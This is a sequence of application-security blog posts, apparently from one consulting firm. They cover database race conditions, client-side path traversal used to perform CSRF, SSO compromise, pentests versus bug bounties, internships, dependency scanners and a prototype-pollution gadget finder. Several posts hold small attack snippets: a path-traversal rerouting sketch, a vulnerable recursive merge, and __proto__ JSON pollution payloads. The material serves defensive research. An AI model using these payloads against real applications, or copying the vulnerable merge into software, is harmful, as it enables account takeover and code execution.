To finish up, we should emphasize that this is not a bug in database engines. This is part of how isolation levels were designed and implemented and it is clearly described in both the SQL specification and dedicated documentation for each database. Transactions and isolation levels were designed to protect concurrent operations from interfering with each other. Mitigations against data races and race conditions, however, are not their primary use case. Unfortunately, we found that this is a common misconception.

While the use of transactions will help guard the application from data corruption under normal circumstances, it is not sufficient to mitigate data races. When this insecure pattern is introduced in business-critical code (account management functionality, financial transactions, discount code application, etc.), the likelihood of it being exploitable is high. For that reason, review your application’s business-critical operations and verify that they are doing proper data locking.

Resources

This research was presented by Viktor Chuchurski (@viktorot) at the 2024 OWASP Global AppSec conference in Lisbon. The recording of that presentation can be found here and the presentation slides can be downloaded here.

Playground code can be found on Doyensec’s GitHub.

More information

Appendix - Testing Results

The table below shows which isolation levels allowed the race condition to occur (Y) and which prevented it (N) for the databases we tested as part of our research.

Database	Read Uncommitted (RU)	Read Committed (RC)	Repeatable Read (RR)	Serializable (S)
MySQL	Y	Y	Y	N
Postgres	Y	Y	N	N
MariaDB	Y	Y	Y	N

Exploiting Client-Side Path Traversal to Perform Cross-Site Request Forgery - Introducing CSPT2CSRF

2024-07-02T00:00:00+02:00

To provide users with a safer browsing experience, the IETF proposal named “Incrementally Better Cookies” set in motion a few important changes to address Cross-Site Request Forgery (CSRF) and other client-side issues. Soon after, Chrome and other major browsers implemented the recommended changes and introduced the SameSite attribute. SameSite helps mitigate CSRF, but does that mean CSRF is dead?

While auditing major web applications, we realized that Client-Side Path Traversal (CSPT) can actually be leveraged to resuscitate CSRF for the joy of all pentesters.

This blog post is a brief introduction to my research. The detailed findings, methodologies, and in-depth analysis are available in the whitepaper.

This research introduces the basics of Client-Side Path Traversal, presenting sources and sinks for Cross-Site Request Forgery. To demonstrate the impact and novelty of our discovery, we showcased vulnerabilities in major web messaging applications, including Mattermost and Rocket.Chat, among others.

Finally, we are releasing a Burp extension to help discover Client-Side Path-Traversal sources and sinks.

Thanks to the Mattermost and Rocket.Chat teams for their collaboration and authorization to share this.

Client-Side Path Traversal (CSPT)

Every security researcher should know what a path traversal is. This vulnerability gives an attacker the ability to use a payload like ../../../../ to read data outside the intended directory. Unlike server-side path traversal attacks, which read files from the server, client-side path traversal attacks focus on exploiting this weakness in order to make requests to unintended API endpoints.
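
A minimal Go sketch of the rerouting effect is shown below. It only imitates what happens in the browser: path.Clean stands in for the dot-segment normalization applied before a request is sent, and the apiPathFor function and the endpoint paths are hypothetical, chosen purely for illustration.

```go
package main

import (
	"fmt"
	"path"
)

// apiPathFor imitates a front end that concatenates an attacker-influenced id
// into an API path. path.Clean stands in for the dot-segment normalization a
// browser applies before sending the request.
func apiPathFor(id string) string {
	return path.Clean("/api/v1/posts/" + id)
}

func main() {
	fmt.Println(apiPathFor("1337"))                // /api/v1/posts/1337
	fmt.Println(apiPathFor("../users/42/promote")) // /api/v1/users/42/promote
}
```

The front end still believes it is calling the posts endpoint, but the request that leaves the browser targets a different one, carrying the victim's credentials.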

While this class of vulnerabilities is very popular on the server side, only a few occurrences of Client-Side Path Traversal have been widely publicized. The first reference we found was a bug reported by Philippe Harewood in the Facebook bug bounty program. Since then, we have only found a few references about Client-Side Path Traversal:

a tweet from Sam Curry back in 2021
1-click CSRF in GitLab by Johan Carlsson
CSS Injection by Medi, nominated in the PortSwigger Top 10 Web Hacking Techniques of 2022
a CSRF by Antoine Roly from Erasec

Some other references were found about Client-Side CSRF from OWASP and in this research paper by Soheil Khodayari and Giancarlo Pellegrino.

Client-Side Path Traversal has been overlooked for years. While considered by many as a low-impact vulnerability, it can actually be used to force an end user to execute unwanted actions on a web application.

Client-Side Path Traversal to Perform Cross-Site Request Forgery (CSPT2CSRF)

This research evolved from exploiting multiple Client-Side Path Traversal vulnerabilities during our web security engagements. However, we realized there was a lack of documentation and knowledge to understand the limits and potential impacts of using Client-Side Path Traversal to perform CSRF (CSPT2CSRF).

Source

While working on this research, we figured out that one common bias exists. Researchers may think that user input has to be in the front end. However, like with XSS, any user input can lead to CSPT (think DOM, Reflected, Stored):

URL fragment
URL Query
Path parameters
Data injected in the database

When evaluating a source, you should also consider if any action is needed to trigger the vulnerability or if it’s triggered when the page is loaded. Indeed, this complexity will impact the final severity of the vulnerability.

Sink

The CSPT will reroute a legitimate API request. Therefore, the attacker may not have control over the HTTP method, headers and request body.

All these restrictions are tied to a source. Indeed, the same front end may have different sources that perform different actions (e.g., GET/POST/PATCH/PUT/DELETE).

Each CSPT2CSRF needs to be described (source and sink) to identify the complexity and severity of the vulnerability.

As an attacker, we want to find all impactful sinks that share the same restrictions. This can be done with:

API documentation
Source code review
Semgrep rules
Burp Suite Bambda filter

CSPT2CSRF with a GET Sink

Some scenarios of exploiting CSPT with a GET sink exist:

Using an open redirect to leak sensitive data associated with the source
Using an open redirect to load malicious data in order to trigger an XSS

However, open redirects are now hunted by many security researchers, and finding an XSS in a front end using a modern framework may be hard.

That said, during our research, even when state-changing actions weren’t implemented directly with a GET sink, we were frequently able to exploit them via CSPT2CSRFs, without having the two previous prerequisites.

In fact, it is often possible to chain a CSPT2CSRF having a GET sink with another state-changing CSPT2CSRF.

1st primitive: GET CSPT2CSRF:

Source: id param in the query
Sink: GET request on the API

2nd primitive: POST CSPT2CSRF:

Source: id from the JSON data
Sink: POST request on the API

To chain these primitives, a GET sink gadget must be found, and the attacker must control the id of the returned JSON. Sometimes, it may be directly authorized by the back end, but the most common gadget we found was to abuse file upload/download features. Indeed, many applications exposed file upload features in the API. An attacker can upload JSON with a manipulated id and target this content to trigger the CSPT2CSRF with a state-changing action.

In the whitepaper, we explain this scenario with an example in Mattermost.

This research was presented last week by Maxence Schmitt (@maxenceschmitt) at OWASP Global Appsec Lisbon 2024. The slides can be found here.

This blog post is just a glimpse of our extensive research. For a comprehensive understanding and detailed technical insights, please refer to the whitepaper.

Along with this whitepaper, we are releasing a Burp extension to find Client-Side Path Traversals.

In Conclusion

We feel CSPT2CSRF is overlooked by many security researchers and unknown by most front-end developers. We hope this work will highlight this class of vulnerabilities and help both security researchers and defenders to secure modern applications.

More information

Single Sign-On Or Single Point of Failure?

2024-06-20T00:00:00+02:00

No one can argue with the convenience that single sign-on (SSO) brings to users or the security and efficiency gains organizations reap from the lower administrative overhead. Gone are the days of individually managing multiple user accounts across numerous services. That said, have we just put all our eggs in one proverbial basket with regards to our SSO implementations? The results of our latest research remind us of why the saying cautions against doing this.

Threat modeling an IdP compromise

To help organizations assess their exposure in the event of an IdP compromise, we’re publishing a whitepaper that walks through these potential impacts. It examines how they differ depending on the privileges involved with the compromise. This includes the surprising impacts that even an unprivileged IdP account can have, all the way up to the complete disaster caused by a fully compromised IdP.

As part of our continuing collaboration with Teleport, our Francesco Lacerenza (@lacerenza_fra) explored these scenarios and how they apply to it specifically. If you’re not familiar with it, “The Teleport Access Platform is a suite of software and managed services that delivers on-demand, least-privileged access to infrastructure on a foundation of cryptographic identity and Zero Trust…”, thereby integrating robust authentication and authorization throughout an infrastructure.

Defense and Detection

As our motto is “Build with Security”, we help organizations build more secure environments, so we won’t leave you hanging with nightmares about what can go wrong with your SSO implementation. As part of this philosophy, the research behind our whitepaper included creating a number of Teleport hardening recommendations to protect your organization and limit potential impacts, in even the worst of scenarios. We also provide detailed information on what to look for in logs when attempting to detect various types of attacks. For those seeking the TL;DR, we are also publishing a convenient hardening checklist, which covers our recommendations and can be used to quickly communicate them to your busy teams.

More Information

Be sure to download the whitepaper (here) and our checklist (here) today! If you would like to learn more about our other research, check out our blog, follow us on X (@doyensec) or feel free to contact us at info@doyensec.com for more information on how we can help your organization “Build with Security”.

Product Security Audits vs. Bug Bounty

2024-05-02T00:00:00+02:00

Every so often we see people discussing whether they still need to have product security audits (commonly referred to as pentests) because they have a bug bounty program. While the answer to this seems clear to us, it nonetheless is a recurring topic of discussion, particularly in the information security corners of social media. We’ve decided to publish our thoughts on this topic to clarify it for those who might still be unsure.

Defining the approaches

Product Security Audit

What we refer to as a product security audit is a time-bound project, where one or more engineers focus on a particular application exclusively. The testing is performed by employees of an application security firm. This work is usually scoped ahead of time and billed at flat hourly/daily rates, with the total cost known to the client prior to commencing.

These can be white box (i.e., access to source code and documentation) or black box (i.e., no source code access, with or without documentation), or somewhere in the middle. There is usually a well-defined scope and often preliminary discussions on points of interest to investigate more closely than others. Frequently, there will also be a walkthrough of the application’s functionality. More often than not, the testing takes place in a predefined set of days and hours. This is typically when the client is available to respond to questions, react in the event of potential issues (e.g., a site going down) or possibly to avoid peak traffic times.

Because of the trust that clients have in professional firms, they will often permit them direct access to their infrastructure and code - something that is generally never done in a bug bounty program. This empowers the testers to find bugs that are potentially very difficult to find externally and things that may be out of scope for dynamic tests, such as denial-of-service vulnerabilities. Additionally, with this approach, it’s common to discover one vulnerability, only to then quickly discover it’s a systemic issue specifically because of the access to the code. With this access, it is also much easier to identify things like vulnerable dependencies, often buried deep in the application.

Once the testing is complete, the provider will usually supply a written report and may have a wrap-up call with the client. There may also be a follow-up (retest) to ensure a client’s attempts at remediation have been successful.

Bug Bounty Programs

What is most commonly referred to as a bug bounty program is typically an open-ended, ongoing effort where the testing is performed by the general public. Some companies may limit participation to a smaller group, permitting participation on whatever criteria they wish, with past performance in other programs being a commonly used factor.

Most programs define a scope of things to be tested and the vulnerability types that they are interested in receiving reports on. The client typically sets the payout amounts they are offering, with escalating rewards for more impactful discoveries. The client is also free to incentivize testing on certain areas through promotions (e.g., double bounties on their new product). Most bug bounty programs are exclusively black box, with no source code or documentation provided to the participating testers.

In most programs, there are no limits as to when the testing occurs. The participants determine if and when they perform testing. Because of this, any outages caused by the testing are usually treated as either normal engineering outages or potentially as security incidents. Some programs do ask their testers to identify their traffic via various means (e.g., passing a unique header) to more easily understand what they’re seeing in logs, if questions arise.

The bug bounty program’s concept of reporting is commonly individual bug reports, with or without a pre-formatted submission form. It is also common for programs to request that the person submitting the report validate the fix.

Hybrid Approaches

While not the focus of this post, we felt it was necessary to also acknowledge that there are hybrid approaches available. These offerings combine various aspects of both a bug bounty program and focused product security audits. We hope this post will inform the reader well enough to ensure they select the approach and mix of services that is right for their organization and fully understand what each entails.

Contrasting the approaches

From the definitions, the two approaches seem reasonably similar, but when we go below the surface, the differences become more apparent.

The people

It’s not fair to paint any group with a broad brush, but there are some clear differences between who typically works in a product security audit versus a bug bounty program. Both approaches can result in great people testing an application and both could potentially result in participants lacking the professionalism and/or skill set you hoped for.

When a firm is retained to perform testing for a client, the firm is staking their reputation on the client’s satisfaction. Most reputable firms will attempt to provide clients with the best people they have available, ideally considering their specific skills for the engagement. The firm assumes the responsibility to screen their employees’ technical abilities, usually through multiple rounds of testing and interviewing prior to hiring, along with ongoing supervision, training and mentoring. Clients are also often provided with summaries of the engineers’ résumés, with the option to request alternate testers, if they feel their background doesn’t match with the project. Lastly, providers are also usually required to perform criminal background checks on their staff to meet client requirements.

A Bug Bounty program usually has very minimal entry requirements. Typically this just means that the participants are not from embargoed countries. Participants could be anyone from professionals looking to make extra money, security researchers, college students or even complete novices looking to build a résumé. While theoretically a client may draw more eyes to their project than in a typical audit, that’s not guaranteed and there are no assurances of their qualifications. Katie Moussouris, a well-known CEO of a bug bounty consultancy, is quoted underscoring this point, saying “Their latest report shows most registered users are basically either fake or unskilled”. Further, per their own statistics, one of the largest platforms stated that only about one percent of their participants “were really doing well”. So, despite large potential numbers, the small percentage of productive participants will be stretched thinly across thousands of programs, at best. In reality, the top participants tend to aggregate around programs they feel are the most lucrative or interesting.

The process

When a client hires a quality firm to perform a product security audit, they’re effectively getting that firm’s collective body of knowledge. This typically means that their personnel have others within the company they can interact with if they encounter problems or need assistance. This also means that they likely have a proprietary methodology they adhere to, so clients should expect thorough and consistent results. Internal peer review and other quality assurance processes are also usually in place to ensure satisfactory results.

Generally, there are limitations on what a client wants or is able to share externally. It is common that a firm and client sign mutual NDAs, so neither party is allowed to disclose information about the audit. Should the firm leak information, they can potentially be held legally liable.

In a bug bounty program, each tester makes their own rules. They may overlap each other, creating repeated redundant tests, or they may complement each other, giving the presumed advantage of many eyes. There is generally no way for a client to know what has or has not been tested. Clients may also find test accounts and data littered throughout the app (e.g., pop-up alerts everywhere), whereas professional testers are typically more restrained and required to not leave such remnants.

Most bug bounty programs don’t require a binding NDA, even if they are considered “private”. Therefore, clients are faced with a decision as to what and how much to share with the program participants. As a practical matter, there is little recourse if a participant decides to share information with others.

The results

When a client hires a firm, they should expect a well-written professional report. Most firms have a proprietary reporting format, but will usually also provide a machine-readable report upon request. In most cases, clients can preview a sample report prior to hiring a firm, so they can get a very clear picture of the deliverables.

Reports from professional audits are typically subjected to several rounds of quality control prior to being delivered to clients. This will typically include a technical review or validation of reported issues, in addition to language and grammar editing to ensure reports are readable and professionally constructed. Additionally, quality firms understand that the results may be reviewed by a wide audience at their clients. They will therefore invest the time and effort to construct them in such a way that readers with a wide range of technical knowledge are all able to understand the results. Testers are also typically required to maintain testing logs and quality documentation of all issues (e.g., screenshots - including requests and responses). This ensures clear findings reports and reproduction steps along with all the supporting materials.

Through personalized relationships with clients and potentially their source code, firms have the opportunity to understand what is important to them, which things keep them up at night and which things they aren’t concerned about. Through kickoff meetings, ongoing direct communication and wrap-up meetings, firms build trust and understanding with clients. This allows them to look at vulnerabilities of all severity levels and understand the context for the client. This could result in simply saving the client’s time or recognizing when a medium severity issue is actually a critical issue, for that client’s organization.

Further, repeated testing allows a client to tangibly demonstrate their commitment to security and how quickly they remediate issues. Additionally, product security audits conducted by experienced engineers, especially those with source code access, can highlight long-term improvements and hardening measures that can be taken, which would not generally be a part of a bug bounty program’s reports.

In a bug bounty program, the results are unpredictable, often seemingly driven mainly by the participants’ focus on payouts. Most companies end up inundated with effectively meaningless reports. Whether valid or not, they are often unrealistic, overhyped, known CVEs or previously known bugs, or issues the organization doesn’t actually care about. It is rare that results fully meet expectations, but not impossible. Submissions tend to cluster around two extremes: issues pushed (often quite imaginatively) to be considered critical or high severity in order to gain the largest payouts, and low-hanging fruit detected by automated scanners, usually reported by lower-rated participants looking for any type of payout, no matter how trivial. The reality is that clients need to pay a premium to get the “good researchers” to participate, but on public programs that itself can also cause a significant uptick in “spam” reports.

Bug bounty reports are typically not formatted in a consistent manner and not machine-readable for ingestion into defect tracking software. Historically, there have been numerous issues that have arisen from reports which were difficult to triage due to language issues, poor grammar or bad proof-of-concept media (e.g., unhelpful screenshots, no logs, meandering videos). To address this, some platforms have gone as far as to incentivize participants to provide clear and easily readable reports via increased payouts, or positive reviews which impact the reporters’ reputation scores.

The value

A professional audit is something that produces a deliverable that a client can hand to a third-party, if necessary. While there is a fixed cost for it, regardless of the results, this documented testing is often required by partner companies and for compliance reasons. Furthermore, when using a reputable firm, a client may find it easier to pass the security requirements of their partners. Lastly, should there be an incident, a client can attest to their due diligence and potentially lessen their legal liability.

A bug bounty provides no assurances as to the amount of the application that is tested (i.e., the “coverage”). It neither produces an acceptable deliverable that can be offered to third parties, nor does it attest to the quality of the skills of those testing the application(s). Further, bug bounty programs don’t typically satisfy any compliance requirements with respect to testing requirements.

Summary

In the following table, we perform a side-by-side comparison of the two approaches to make the differences clearer.

Conclusion

Which approach an organization decides to take will vary based on many factors including budget, compliance requirements, partner requirements, time-sensitivity and confidentiality requirements. For most organizations, we feel the correct approach is a balanced one.

Ideally, an organization should perform recurring product security audits at least quarterly and after major changes. If budgets don’t permit that frequency of testing, the typical compromise is annually, at an absolute minimum.

Bug bounty programs should be used to fill the gaps between rigorous security audits, whether those audits are performed by internal teams or external partners. This is arguably the need they were designed to fill, rather than replacing recurring professional testing.

Internship Experiences at Doyensec

2024-03-22T00:00:00+01:00

The following blog post gives a voice to our 2023 interns and their experiences with us.

Aleandro

During my last high school year I took part in the Cyberchallenge.it program, whose goal is to introduce young students to the world of offensive cybersecurity, via lessons and CTF competitions. After that experience, some friends and I founded the r00tstici CTF team, attempting to bring some cybersecurity culture to the south of Italy. We also organized various workshops and events at the University of Salento.

Once I moved from the south of Italy to Pisa, to study at the university, I joined the fibonhack CTF team. I then also started working as a developer and penetration tester on small projects, both inside the university and outside.

Getting recruited

During April 2023, the Doyensec Twitter account posted a call for summer interns. Since I had been following Doyensec for months, after Luca’s talk at No Hat 2022, I submitted my application. This was both because I was bored with the university routine and because I also wanted to try a job in the research field. This was a good fit, since I was coming from an environment of development and freelance pentesting, alongside CTF competitions.

The selection process I went through has already been described, in large part, by Robert in his previous post about his internship experience. Basically it consisted of:

An interview with the Practice Manager
A technical challenge on both web and mobile topics
Finally, a technical interview with two different security engineers

The interview was about various aspects of application security. This ranged from web security to low level stuff like assembly and even CPU internals.

First weeks

The actual internship started with a couple of weeks of research, where I went through some web application frameworks in Rust. After completing that research, I then moved on to an actual pentest for a client. I remember the first week felt really different and challenging. The code base was so large and so filled with functionalities that I felt overwhelmed with things to test, ideas to try and scenarios to replicate. Despite the size and complexity, there were initially no vulnerabilities found. Impostor syndrome started to kick in.

Eventually, things started to improve during the second week of that engagement. While we’re a 100% remote company, sometimes we get together to work in small teams. That week, I worked in-person with Luca. He helped me understand that sometimes software is just well-written and well-architected from a security perspective. For those situations, I needed to learn how to deal with not having immediate success, the focus required for testing and how to provide value to the client despite having low severity findings. Thankfully, we eventually found good bugs in that codebase anyway :)

Research weeks

The main research topic of my internship experience was about developing internal tools. Although this project was not mainly about security, I enjoyed it a lot. Developing applications, fixing bugs and screaming about non-existent documentation is something I’ve done ever since I bought my first personal computer.

Responsibilities

It is important to note that even though you are the last one who has joined the company and have limited experience, all Doyensec team members treat you like all other employees. You could be in charge of actually talking with the client if you have any issues during an assessment, you will have to write and possibly peer review the reports, you will have to evaluate and assign severities to the vulnerabilities you’ve found, you will have your name on the report, and so on. Of course, you are assigned to work alongside more experienced engineers that will guide you through the process (Lorenzo in my case - who I would like to thank for helping me in managing the flexible schedule and for all the other advice he gave me). However, you learn the most by actually doing and making your own decisions on how to proceed and of course making errors.

To me, this was a mind-blowing feeling. I did not expect to be fully part of the team, or that my opinions would matter. It was really a good approach, in my opinion. It took me a while to fit entirely into the role, but then it was fun all along the way.

Leonardo

Hi, my name is Leonardo. Some of you may know me better as maitai, which is the handle that I’ve been using in the CTF scene from the start of my journey. I encountered cybersecurity while earning my Bachelor of Science in computer science. From the very first moment I was amazed by it. So I decided to dig a bit more into hacking, starting with the PortSwigger Academy, which literally changed my life.

Getting recruited

If you have read the previous part of this blog post you have already met Aleandro. I knew him prior to joining Doyensec, since we played together on the same CTF team: fibonhack. While I was pursuing my previous internship, Aleandro and I talked a lot regarding our jobs and what to do in the near future. One day he told me that Doyensec would have an open internship position during the winter. I was a bit scared at first, just because it would be a really huge step for me to take on such a challenge. My previous internship had already ended when Doyensec opened the position. Although I was considering pursuing a master’s degree, I was still thinking about this opportunity all the time. I didn’t want to miss such a great opportunity, so I decided to submit my application. After all, what did I have to lose? I took it as a way to really challenge myself.

After a quick interview with the Practice Manager, I was made aware of the next steps in the interview process. First of all, the technical challenges used during the process were brand new. The Practice Manager told me that Doyensec had entirely renewed the challenges with a brand new platform and new challenges. I was essentially the first candidate to ever use this new platform.

The topics of the challenges were mostly web applications in several different languages, with different bugs to spot, alongside mobile challenges that involved the use of state-of-the-art technologies. I had 2 hours to complete as many challenges as I could, from a pool of 8. The time constraint was right in my opinion. You have around 15 minutes per challenge, which is a reasonable amount of time. Even though I wasn’t experienced with mobile hacking, I pushed myself to the limit in order to find as many bugs as possible and eventually to pass onto the next steps of the interview process. It was later explained to me that the review of numerous (but short) code snapshots in a limited time-frame is meant to simulate the complexity of reviewing larger codebases with several weeks at your disposal.

A couple of days after the technical challenges I received an email from Doyensec in which they congratulated me for passing the technical challenges. I was thrilled at that point! I literally couldn’t wait for what would come after that! The email stated that the next step was a technical call with Luca. I reserved a spot on his calendar and waited for the day of the interview.

Luca asked me several questions, ranging from threat modeling to how to exploit certain vulnerabilities, to how to patch vulnerable code. It was a 360 degree interview. It also included some live code review. The interview lasted for an hour or so, and in the end Luca said that he would evaluate my performance and let me know. The day after, another email arrived. I had advanced to the final step, the interview with John, Doyensec’s other co-founder. During this interview, he asked me about different things, not strictly related to the application security world. As I said before, they examined me from many angles. The meeting with John also lasted for an hour. At this point, I had completed the whole process. I only needed to wait for their response, which didn’t take too long to come.

They offered me the internship position. I did it! I was happy to have overcome the challenge that I set for myself. I quickly accepted the position in order to jump straight into the action!

First weeks

In my first weeks, I did a lot of different things including retesting web and network level bugs, in order to be sure that all the vulnerabilities previously found by other engineers were properly fixed. I also did standard web application penetration testing. The application itself was really interesting and complex enough to keep my eyes glued to the screen, without losing interest in it. Another amazing engineer was assigned to the aforementioned project with me, so I was not alone during testing.

Since Doyensec is a fully remote company, we also need to hold some meetings during the day, in order to synchronize on different things that can happen during the penetration test. Communication is a key part of Doyensec, and from great communication come great bugs.

Research weeks

During the internship, you’re also given 50% of your time to perform application security R&D. During my research weeks I was assigned to an open source project. In fact, I was tasked to write some plugins for Google’s web security scanner Tsunami. This is a general purpose network security scanner, with an extensible plugins system for detecting high severity vulnerabilities with high confidence. Essentially, writing a plugin for Tsunami requires understanding a certain vulnerability in a product and writing an exploit for it, that can be used to confirm its existence when scanning. I was assigned to write two plugins which detect weak credentials on the RabbitMQ Management Portal and RStudio server. The plugins are written in Java, and since I’ve done a bit of Java programming during my Bachelor’s degree program I felt quite confident about it.

I really enjoyed writing those plugins and was also asked to write unit tests and a testbed that were used to actually reproduce the vulnerabilities. It was a really fun experience!

Responsibilities

As Aleandro already explained, interns are given a lot of responsibilities along with a great sense of freedom at Doyensec. I would add just one thing, which is about time management. This is one of the most difficult things for me to do. In a remote company, you don’t have time clocks or similar, so you can choose to work the way that you prefer. Luca told me several times that at Doyensec the output is what is evaluated. This is a big thing for me to deal with since I was used to working a fixed schedule. Doyensec gave me the flexibility to work in the way I prefer, which for me, is invaluable. That said, the activities are complex enough to keep you busy for several hours a day, but they are so enjoyable.

Conclusions

Being an intern at Doyensec is an awesome experience because it allows you to jump into the world of application security without the need for extensive job experience. You can be successful as long as you have the skills and knowledge, regardless of how you acquired them.

Moreover, during those three months you’ll be able to test your skills and learn new ones on different technologies across a variety of targets. You’ll also get to know passionate and skilled people, and if you’re lucky enough, take part in company retreats and get some exclusive swag.

In the end, you should consider applying for the next call for interns, if you:

are passionate about application security
already have good web security skills
have organizational capabilities
want scheduling flexibility
can manage remote work

If you’re interested in the role and think you’d make a good fit, apply via our careers page: https://www.careers-page.com/doyensec-llc. We’re now accepting candidates for the Summer Internship 2024.

A Look at Software Composition Analysis

2024-03-14T00:00:00+01:00

Background

At Doyensec, we specialize in performing white and gray box application security audits. So, in addition to dynamically testing applications, we typically audit our clients’ source code as well. This process is often software-assisted, with open source and off-the-shelf tools. Modern comprehensive versions of these tools offer the capabilities to detect the inclusion of vulnerable third-party libraries, commonly referred to as software composition analysis (SCA).

Three well-known tools in the SCA space are Snyk, Semgrep and Dependabot. The first two are stand-alone applications, with cloud components to them and the last is integrated into the GitHub(.com) environment directly. Since Security Automation is one of our core competencies, Doyensec has extensive experience with these tools, from writing custom detection rules for Semgrep, to assisting clients with selecting and deploying these types of tools in their SDLC processes. We have also previously published research into some of these, with regards to their Static Analysis Security Testing (SAST) capabilities. You can find those results here. After discussing this research directly with Semgrep, we were asked to perform an unbiased head-to-head comparison of the SCA functionality of these tools as well.

It’s time to ignore most of dependency alerts.

You will find the results of this latest analysis here on our research page. Included in that whitepaper, we describe the process taken to develop the testing corpus and our methodology. In short, the aim was to determine which tool could provide the most actionable and efficient results (i.e., high true positive rates), regardless of the false negative rates. This scenario was thought to be the optimal real-world scenario for most security teams, because most can’t afford to routinely spend hours or days chasing false positives. The person-hours required to triage low fidelity tools in the hopes of an occasional true positive are simply too costly for all but the largest teams in the most secure environments. Additionally, any attempts at implementing deployment blocking as a result of CI/CD testing are unlikely to tolerate more than a minimal amount of false positives.

More to Come

We hope you find the whitepaper comparing the tools informative and useful. Please follow our blog for more posts on current trends and topics in the world of application security. If you would like assistance with your application security projects, including security automation services, feel free to contact us at info@doyensec.com.

Unveiling the Prototype Pollution Gadgets Finder

2024-02-17T00:00:00+01:00

Introduction

Prototype pollution has recently emerged as a fashionable vulnerability within the realm of web security. This vulnerability occurs when an attacker exploits the nature of JavaScript’s prototype inheritance to modify a prototype of an object. By doing so, they can inject malicious code or alter an application to behave in unintended ways. This could potentially lead to sensitive information leakage, type confusion vulnerabilities, or even remote code execution, under certain conditions.

For those interested in diving deeper into the technicalities and impacts of prototype pollution, we recommend checking out PortSwigger’s comprehensive guide.

// Example of prototype pollution in a browser console
Object.prototype.isAdmin = true;
const user = {};
console.log(user.isAdmin); // Outputs: true

To fully understand the exploitation of this vulnerability, it’s crucial to know what “sources” and “gadgets” are.

Sources: A source in the context of prototype pollution refers to a piece of code that performs a recursive assignment without properly validating the objects involved. This action creates a pathway for attackers to modify the prototype of an object. The main sources of prototype pollution are:
- Custom Code: This includes code written by developers that does not adequately check or sanitize user input before processing it. Such code can directly introduce vulnerabilities into an application.
- Vulnerable Libraries: External libraries that contain vulnerabilities can also lead to prototype pollution. This often happens through recursive assignments that fail to validate the safety of the objects being merged or extended.

// Example of recursive assignment leading to prototype pollution
function merge(target, source) {
    for (let key in source) {
        if (typeof source[key] === 'object') {
            if (!target[key]) target[key] = {};
            merge(target[key], source[key]);
        } else {
            target[key] = source[key];
        }
    }
}
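
To see the merge above act as a source, the following sketch feeds it a JSON body containing a __proto__ key. The request body and the isAdmin property are illustrative assumptions. JSON.parse is used because it creates __proto__ as an ordinary own key, which the for...in loop then walks.

```javascript
// Same recursive merge as above, repeated so the snippet runs on its own.
function merge(target, source) {
    for (let key in source) {
        if (typeof source[key] === 'object') {
            if (!target[key]) target[key] = {};
            merge(target[key], source[key]);
        } else {
            target[key] = source[key];
        }
    }
}

// Hypothetical attacker-controlled request body.
const body = JSON.parse('{"name": "guest", "__proto__": {"isAdmin": true}}');

const profile = {};
merge(profile, body);

// target["__proto__"] resolved to Object.prototype, so the nested
// assignment landed on the shared prototype instead of on `profile`.
const unrelated = {};
const pollutedBefore = unrelated.isAdmin; // inherited from Object.prototype
const isOwn = Object.prototype.hasOwnProperty.call(unrelated, 'isAdmin');

// Clean up so the rest of the process is not affected.
delete Object.prototype.isAdmin;
const pollutedAfter = unrelated.isAdmin;

console.log({ pollutedBefore, isOwn, pollutedAfter });
```

An object that never passed through merge still reports isAdmin while the prototype is polluted, which is what makes the issue reachable from unrelated code paths.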

Gadgets: Gadgets refer to methods or pieces of code that exploit the prototype pollution vulnerability to achieve an attack. By manipulating the prototype of a base object, attackers can alter the application’s logic, gain unauthorized access, or execute arbitrary code, depending on the application’s structure and the nature of the polluted prototype.

State of the Art

Before diving into the specifics of our research, it’s crucial to understand the landscape of existing research on prototype pollution. This will help us identify the gaps in current methodologies and tools, and how our work aims to address them.

On the client side, there is a wealth of research and tools available. For sources, an excellent starting point is the compilation found on GitHub (client-side prototype pollution sources). As for gadgets, detailed exploration and exploitation techniques have been documented in various write-ups, such as this informative piece on InfoSec Writeups and PortSwigger’s own guide on client-side prototype pollution.

Additionally, there are tools designed to detect and exploit this vulnerability in an automated manner, both from the command line and within the browser. These include the PP-Finder CLI tool and DOM Invader, a feature of Burp Suite designed to uncover client-side prototype pollution.

However, the research and tooling landscape for server-side prototype pollution presents a different picture:

PortSwigger’s research provides a foundational understanding of server-side prototype pollution with various detection methodologies. However, a significant limitation is that some of these detection methods have become obsolete over time. More importantly, while it excels in identifying vulnerabilities, it does not extend to facilitating their real-world exploitation using gadgets. This gap indicates a need for tools that not only detect but also enable the practical exploitation of identified vulnerabilities.
On the other hand, YesWeHack’s guide introduces several intriguing gadgets, some of which have been incorporated into our plugin (below). Despite this valuable contribution, the guide occasionally ventures into hypothetical scenarios that may not always align with realistic application contexts. Moreover, it falls short of providing an automated approach for discovering gadgets in a black-box testing environment. This is crucial for comprehensive vulnerability assessments and exploitation in real-world settings.

This overview underscores the need for further innovation in server-side prototype pollution research, specifically in developing tools that not only detect but also exploit this vulnerability in a practical, automated manner.

About the Plugin

Following the insights previously discussed, we’ve developed a Burp Suite plugin for detecting gadgets in server-side prototype pollution: the Prototype Pollution Gadgets Finder, available at GitHub. This tool represents a novel approach in the realm of web security, focusing on the precise identification and exploitation of prototype pollution vulnerabilities.

The core functionality of this plugin is to take a JSON object from a request and systematically attempt to poison all possible fields with a predefined set of gadgets. For example, given a JSON object:

{
  "user": "example",
  "auth": false
}

The plugin would attempt various poisonings, such as:

{
  "user": {"__proto__": <polluted_object>},
  "auth": false
}

or:

{
  "user": "example",
  "auth": {"__proto__": <polluted_object>}
}
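
The field-by-field poisoning shown above can be sketched roughly as follows. This is not the plugin's code: protoWrapper and poisonVariants are hypothetical helpers, the payload host is a placeholder, and only top-level fields are handled to keep the example short.

```javascript
// Wrap a payload so that it serializes as {"__proto__": payload}.
// Object.defineProperty is used because a plain assignment to `__proto__`
// would change the object's prototype instead of creating a key.
function protoWrapper(pollutedObject) {
    const wrapper = {};
    Object.defineProperty(wrapper, '__proto__', {
        value: pollutedObject,
        enumerable: true,
        writable: true,
        configurable: true,
    });
    return wrapper;
}

// Produce one variant per top-level field (hypothetical helper; nested
// fields and arrays are ignored in this sketch).
function poisonVariants(body, pollutedObject) {
    return Object.keys(body).map((field) => {
        const variant = { ...body };
        variant[field] = protoWrapper(pollutedObject);
        return variant;
    });
}

const original = { user: 'example', auth: false };
const polluted = { baseURL: 'https://collaborator.example' }; // placeholder payload
const variants = poisonVariants(original, polluted).map((v) => JSON.stringify(v));
variants.forEach((v) => console.log(v));
```

Each variant leaves the other fields untouched, so a single request tests exactly one candidate injection point.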

